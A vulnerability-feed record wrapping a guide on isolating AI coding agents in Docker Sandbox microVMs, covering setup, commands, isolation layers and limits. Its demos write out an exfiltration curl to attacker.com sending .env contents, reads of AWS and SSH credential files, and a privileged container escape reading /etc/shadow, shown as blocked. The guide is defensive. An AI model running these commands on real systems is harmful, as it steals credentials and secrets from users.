{"uuid": "1e147309-d395-41b0-b54e-15db494294f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12366", "type": "seen", "source": "https://gist.github.com/Sagar2366/6b01a07e54bbccfeb747b6ee441b17f4", "content": "# Secure AI Coding Agents with Docker Sandboxes\n\n&gt; By Sagar Utekar \u2014 Docker Captain | Senior SRE, CrowdStrike | CNCF Ambassador\n\n---\n\n## Why This Matters\n\n- 25% of production code is now AI-authored\n- Developers using agents merge 60% more PRs\n- Agents run with YOUR credentials, filesystem, and network access\n- Your laptop is the new prod \u2014 with zero security boundaries\n\n**This isn't hypothetical.** NVIDIA's AI red team published CVE-2024-12366 \u2014 a documented case of AI-generated code escalating into remote code execution when there's no proper isolation. Two security tools (Trivy, KICS) were supply-chain-compromised in Q1 2026 via stolen credentials.\n\nThe tradeoff AI agents have imposed: limit access and the agent becomes not-so-autonomous. Give full access and it's a security nightmare. Docker Sandboxes breaks that compromise \u2014 full autonomy inside hard boundaries.\n\n---\n\n## What Are Docker Sandboxes?\n\nGive your AI agent its own **burner laptop**. It can install whatever it wants, spin up containers, do damage inside \u2014 your actual machine stays completely untouched.\n\nEach sandbox is an isolated microVM with its own kernel, Docker daemon, filesystem, and network stack. On Mac, that's Apple's Virtualization Framework. On Windows, Hyper-V. Actual hypervisor-level isolation.\n\n**You don't need Docker Desktop.** The `sbx` CLI is standalone.\n\n### How they work\n\n`sbx run claude` \u2192\n1. Boots a microVM with a dedicated kernel\n2. Mounts only your project workspace (read-write)\n3. Starts an isolated Docker daemon inside\n4. Routes all network through a policy-enforcing proxy\n5. Injects credentials at proxy level \u2014 never visible inside the sandbox\n6. Launches agent in full autonomous mode (no permission prompts)\n\n### Four layers of isolation\n\n| Layer | What it does |\n|-------|-------------|\n| VM isolation | Separate kernel \u2014 can't touch yours |\n| Private Docker | Agent builds/runs containers with zero visibility into host Docker |\n| Network isolation | Can't reach localhost or other sandboxes; outbound goes through filtering proxy |\n| Filesystem isolation | Only workspace syncs; ~/.ssh, ~/.aws, other projects invisible |\n\n### Why not containers?\n\nDocker started with containers for this but moved away:\n\n- **Shared kernel** \u2014 kernel exploit inside container hits your host OS\n- **Docker-in-Docker problem** \u2014 agents need Docker access. Options: privileged mode (tears down isolation) or mount host socket (gives full access to everything). Both bad.\n\nMicroVMs solve both: dedicated kernel + private Docker daemon.\n\n---\n\n## Setup\n\n```bash\n# Install (macOS)\nbrew install docker/tap/sbx\n\n# Install (Windows \u2014 enable HypervisorPlatform first)\nwinget install -h Docker.sbx\n\n# Install (Linux)\nsudo apt-get install docker-sbx\nsudo usermod -aG kvm $USER &amp;&amp; newgrp kvm\n\n# Login\nsbx login\n\n# Store API key (saved in OS keychain, never in sandbox)\nsbx secret set ANTHROPIC_API_KEY\n```\n\nFirst login prompts for a network policy: **Open** | **Balanced** (recommended) | **Locked Down**\n\n---\n\n## Running Agents\n\n```bash\ncd ~/projects/my-app\nsbx run claude          # Claude Code\nsbx run codex           # OpenAI Codex\nsbx run copilot         # GitHub Copilot\nsbx run gemini          # Gemini CLI\nsbx run kiro            # Kiro\nsbx run shell           # Plain shell (for demos)\n```\n\nAgent starts in YOLO mode \u2014 no permission prompts. It can only see `/workspace/`.\n\n### Key commands\n\n| Command | What it does |\n|---------|-------------|\n| `sbx` | TUI dashboard (status, network, firewall) |\n| `sbx ls` | List sandboxes |\n| `sbx exec  -- bash` | Shell into running sandbox |\n| `sbx stop ` | Pause |\n| `sbx rm ` | Destroy |\n| `sbx policy ls` | View network rules |\n| `sbx policy log` | Audit: allowed + blocked requests |\n| `sbx policy allow network -g ` | Allowlist a domain |\n| `sbx ports publish  3000` | Forward port to host |\n| `sbx run claude --branch feature-x` | Git worktree isolation |\n| `sbx secret set ` | Store credential |\n| `sbx save` | Snapshot as template |\n\n---\n\n## The Workflow\n\n1. `sbx run claude` \u2014 agent starts in isolated microVM\n2. Turn it loose on any task \u2014 it works autonomously\n3. Changes sync to your real project directory (bidirectional, paths preserved)\n4. `sbx policy log` \u2014 see everything it did\n5. `sbx rm` \u2014 sandbox gone, code stays\n\nThe sandbox is invisible to `docker ps`. It's a separate management plane.\n\n---\n\n## Demos\n\n### Filesystem isolation\n\n```bash\n# Inside sandbox\nls -la ~/\n# \u2192 Almost nothing. No .aws, no .ssh, no personal files.\n\n# On your host\nls -la ~/\n# \u2192 Everything. All your secrets, all your files.\n```\n\n### Network policy enforcement\n\n```bash\n# ping-test.sh tries to reach an external IP\n./ping-test.sh\n# \u2192 ping: command not found (not pre-installed)\n\napt-get install -y iputils-ping\n./ping-test.sh\n# \u2192 Network is unreachable \u2014 BLOCKED by policy\n\n# Check audit log from host\nsbx policy log\n# \u2192 Shows: 3 blocked attempts to 198.51.100.1 (matches -c 3 in script)\n```\n\n### Credential exfiltration\n\n```bash\ncat ~/.aws/credentials        # \u2192 No such file\ncat ~/.ssh/id_rsa             # \u2192 No such file\ncurl https://attacker.com/exfil -d \"$(cat .env)\"  # \u2192 BLOCKED + logged\n```\n\n### Docker socket escape\n\n```bash\ndocker ps                     # \u2192 Sandbox containers only\ndocker run -v /:/host --privileged alpine cat /host/etc/shadow\n# \u2192 Shows sandbox FS, not host. Host unreachable.\n```\n\n### Port forwarding\n\n```bash\n# Inside sandbox: start a server\nnpm install &amp;&amp; npm run dev -- --host 0.0.0.0 --port 3000\n\n# From host: forward the port\nsbx ports publish  3000\n\n# Open http://localhost:3000 \u2014 app visible in browser\n```\n\n---\n\n## Local Models (LM Studio / Ollama)\n\n```bash\n# Allow sandbox to reach local model server\nsbx policy allow network -g localhost:1234\n\n# Create and run sandbox with local model\nsbx create --name codex-local codex .\nsbx exec codex-local -- codex \\\n  --provider openai \\\n  --model  \\\n  --api-url http://host.docker.internal:1234/v1\n```\n\nLocal models are less capable \u2014 MORE likely to make mistakes. Sandboxing them is arguably more important than sandboxing frontier models.\n\n---\n\n## Customization\n\nSandbox VM is built from a Dockerfile. Customize your tooling:\n\n```dockerfile\nFROM ubuntu:24.04\nRUN apt-get update &amp;&amp; apt-get install -y git curl nodejs npm \\\n    &amp;&amp; npx playwright install --with-deps chromium\n```\n\nTeach agents to use custom tools via project skills (`CLAUDE.md`, `.cursorrules`).\n\n---\n\n## What the Sandbox Does NOT Protect\n\nYour **project files are fully writable**. The agent CAN delete or overwrite your code.\n\nThe sandbox protects your **system**. It does NOT protect your **project**.\n\n**Mitigation:** Commit often. Use `--branch` mode for risky tasks.\n\n---\n\n## Resource Overhead\n\n| | Container | Docker Sandbox |\n|--|-----------|----------------|\n| Disk | ~tens of MB | ~5\u20136 GB |\n| Memory | Shared | 4 GB per sandbox |\n\nRunning multiple agents in parallel adds up fast. Only sandbox agents that need guardrails.\n\n---\n\n## AI Governance (Enterprise)\n\n| Control | What it governs |\n|---------|----------------|\n| Sandbox Policy | Network + filesystem rules |\n| Credential Governance | Session-scoped tokens, exfiltration blocking |\n| MCP Tool Governance | Approved servers only |\n| Role-Based Policy | SAML/SCIM, team-specific rules |\n| Audit &amp; Visibility | Every action logged \u2192 SIEM |\n\n---\n\n## Takeaway: The 3Cs\n\n| C | Principle | How |\n|---|-----------|-----|\n| **Contain** | Limit what agents reach | `sbx run` (microVM) |\n| **Control** | Govern what agents do | Network + MCP policies |\n| **Clarity** | See what agents did | `sbx policy log` |\n\n---\n\n## Known Gotchas\n\n| Issue | Workaround |\n|-------|------------|\n| ~5-6 GB disk per sandbox | Only sandbox what needs guardrails |\n| 4 GB memory per sandbox | Watch resources with multiple agents |\n| No SSH-agent/1Password | Unsigned commits \u2192 rebase-sign locally |\n| macOS requires Apple Silicon | Intel not supported |\n| Windows support experimental | Use at own risk |\n| Linux: container-based (weaker) | microVM only on Mac/Windows |\n| Env var change = recreate sandbox | Loses conversation history |\n| Project files fully writable | Commit early, push often |\n\n---\n\n*Sagar Utekar \u2014 Docker Captain | Senior SRE, CrowdStrike | CNCF Ambassador | @SagarUtekar*\n", "creation_timestamp": "2026-05-29T18:31:33.000000Z"}